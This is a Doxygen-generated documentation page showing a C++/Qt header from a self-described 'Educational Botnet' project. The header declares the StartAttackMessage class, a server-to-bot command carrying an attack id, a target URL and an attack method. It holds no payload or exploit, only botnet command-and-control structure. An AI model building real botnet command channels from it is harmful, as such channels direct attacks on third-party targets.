<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Educational Botnet - Malware: C:/Users/james/Desktop/Dev/Github/eductional-botnet/src/bot/Malware/SharedKernel/Network/Messages/Server/startattackmessage.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
  $(document).ready(initResizable);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">Educational Botnet - Malware
   </div>
   <div id="projectbrief">The client application that runs the malware.</div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
  <div id="nav-tree">
    <div id="nav-tree-contents">
      <div id="nav-sync" class="sync"></div>
    </div>
  </div>
  <div id="splitbar" style="-moz-user-select:none;" 
       class="ui-resizable-handle">
  </div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('startattackmessage_8h_source.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div class="header">
  <div class="headertitle">
<div class="title">startattackmessage.h</div>  </div>
</div><!--header-->
<div class="contents">
<div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="preprocessor">#ifndef STARTATTACKMESSAGE_H</span></div><div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="preprocessor">#define STARTATTACKMESSAGE_H</span></div><div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;</div><div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160;<span class="preprocessor">#include &lt;memory&gt;</span></div><div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;</div><div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &lt;QJsonObject&gt;</span></div><div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &lt;QString&gt;</span></div><div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &lt;QUrl&gt;</span></div><div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160;</div><div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="preprocessor">#include &quot;servermessage.h&quot;</span></div><div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;</div><div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="keyword">namespace </span><a class="code" href="namespacenetwork.html">network</a> { <span class="keyword">namespace </span>messages { <span class="keyword">namespace </span>server</div><div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160;{</div><div class="line"><a name="l00017"></a><span class="lineno"><a class="line" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html">   17</a></span>&#160;    <span class="keyword">class </span><a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html">StartAttackMessage</a> : <span class="keyword">public</span> <a class="code" href="classnetwork_1_1messages_1_1server_1_1_server_message.html">ServerMessage</a></div><div class="line"><a name="l00018"></a><span class="lineno">   18</span>&#160;    {</div><div class="line"><a name="l00019"></a><span class="lineno">   19</span>&#160;        Q_OBJECT</div><div class="line"><a name="l00020"></a><span class="lineno">   20</span>&#160;</div><div class="line"><a name="l00021"></a><span class="lineno">   21</span>&#160;    <span class="keyword">private</span>:</div><div class="line"><a name="l00025"></a><span class="lineno">   25</span>&#160;        <span class="keywordtype">int</span> idAttack_;</div><div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;</div><div class="line"><a name="l00030"></a><span class="lineno">   30</span>&#160;        QString methodOfAttack_;</div><div class="line"><a name="l00031"></a><span class="lineno">   31</span>&#160;</div><div class="line"><a name="l00035"></a><span class="lineno">   35</span>&#160;        QUrl target_;</div><div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;</div><div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;    <span class="keyword">public</span>:</div><div class="line"><a name="l00042"></a><span class="lineno">   42</span>&#160;        <span class="keyword">static</span> std::shared_ptr&lt;StartAttackMessage&gt; <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a8c9206c58ceb6e10f2fd2a9b41621645">fromJson</a>(QJsonObject json);</div><div class="line"><a name="l00043"></a><span class="lineno">   43</span>&#160;</div><div class="line"><a name="l00050"></a><span class="lineno">   50</span>&#160;        <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a459298e788260a07f1aa26a1b41d91fb">StartAttackMessage</a>(<span class="keywordtype">int</span> <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a61ac98651e15bcb33810bf6f9f2139d8">idAttack</a>, QUrl <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a1419fc4090cd5e0cc3059ea01536d014">target</a>, QString <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a754408f3edd913dd9d8519dd057a7634">methodOfAttack</a>);</div><div class="line"><a name="l00051"></a><span class="lineno">   51</span>&#160;</div><div class="line"><a name="l00055"></a><span class="lineno">   55</span>&#160;        <span class="keywordtype">int</span> <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a61ac98651e15bcb33810bf6f9f2139d8">idAttack</a>();</div><div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;</div><div class="line"><a name="l00060"></a><span class="lineno">   60</span>&#160;        QString <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a754408f3edd913dd9d8519dd057a7634">methodOfAttack</a>();</div><div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;</div><div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160;        QUrl <a class="code" href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a1419fc4090cd5e0cc3059ea01536d014">target</a>();</div><div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160;    };</div><div class="line"><a name="l00067"></a><span class="lineno">   67</span>&#160;}}}</div><div class="line"><a name="l00068"></a><span class="lineno">   68</span>&#160;</div><div class="line"><a name="l00069"></a><span class="lineno">   69</span>&#160;<span class="preprocessor">#endif // STARTATTACKMESSAGE_H</span></div><div class="ttc" id="namespacenetwork_html"><div class="ttname"><a href="namespacenetwork.html">network</a></div><div class="ttdef"><b>Definition:</b> httpserveradapter.cpp:18</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html_a754408f3edd913dd9d8519dd057a7634"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a754408f3edd913dd9d8519dd057a7634">network::messages::server::StartAttackMessage::methodOfAttack</a></div><div class="ttdeci">QString methodOfAttack()</div><div class="ttdoc">Gets the method of attack used against the target. </div><div class="ttdef"><b>Definition:</b> startattackmessage.cpp:31</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html_a8c9206c58ceb6e10f2fd2a9b41621645"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a8c9206c58ceb6e10f2fd2a9b41621645">network::messages::server::StartAttackMessage::fromJson</a></div><div class="ttdeci">static std::shared_ptr&lt; StartAttackMessage &gt; fromJson(QJsonObject json)</div><div class="ttdoc">A static method to convert a JSON object into a new instance of StartAttackMessage. </div><div class="ttdef"><b>Definition:</b> startattackmessage.cpp:5</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html">network::messages::server::StartAttackMessage</a></div><div class="ttdoc">A message that represents a request to attack a given target. </div><div class="ttdef"><b>Definition:</b> startattackmessage.h:17</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html_a459298e788260a07f1aa26a1b41d91fb"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a459298e788260a07f1aa26a1b41d91fb">network::messages::server::StartAttackMessage::StartAttackMessage</a></div><div class="ttdeci">StartAttackMessage(int idAttack, QUrl target, QString methodOfAttack)</div><div class="ttdoc">Creates a new instance of the class StartAttackMessage. </div><div class="ttdef"><b>Definition:</b> startattackmessage.cpp:18</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html_a61ac98651e15bcb33810bf6f9f2139d8"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a61ac98651e15bcb33810bf6f9f2139d8">network::messages::server::StartAttackMessage::idAttack</a></div><div class="ttdeci">int idAttack()</div><div class="ttdoc">Gets the identifier of the attack referenced on the server. </div><div class="ttdef"><b>Definition:</b> startattackmessage.cpp:26</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_start_attack_message_html_a1419fc4090cd5e0cc3059ea01536d014"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_start_attack_message.html#a1419fc4090cd5e0cc3059ea01536d014">network::messages::server::StartAttackMessage::target</a></div><div class="ttdeci">QUrl target()</div><div class="ttdoc">Gets the URL of the target. </div><div class="ttdef"><b>Definition:</b> startattackmessage.cpp:36</div></div>
<div class="ttc" id="classnetwork_1_1messages_1_1server_1_1_server_message_html"><div class="ttname"><a href="classnetwork_1_1messages_1_1server_1_1_server_message.html">network::messages::server::ServerMessage</a></div><div class="ttdoc">A message sent by the server. </div><div class="ttdef"><b>Definition:</b> servermessage.h:13</div></div>
</div><!-- fragment --></div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
  <ul>
    <li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="dir_29d667bb07f05bb7400afdc76794b290.html">bot</a></li><li class="navelem"><a class="el" href="dir_5f03ef8c3e132976bb5c0fed65d67894.html">Malware</a></li><li class="navelem"><a class="el" href="dir_e1df2a116952d1b3724a34cefd121e68.html">SharedKernel</a></li><li class="navelem"><a class="el" href="dir_3f0d87d1b1fda081c782cbccb58add5d.html">Network</a></li><li class="navelem"><a class="el" href="dir_b79dbe25196a889f78aa5df7c6ef7436.html">Messages</a></li><li class="navelem"><a class="el" href="dir_002cc1a6144d7d0b83eb7849dd8c5872.html">Server</a></li><li class="navelem"><b>startattackmessage.h</b></li>
    <li class="footer">Generated by
    <a href="http://www.doxygen.org/index.html">
    <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.13 </li>
  </ul>
</div>
</body>
</html>
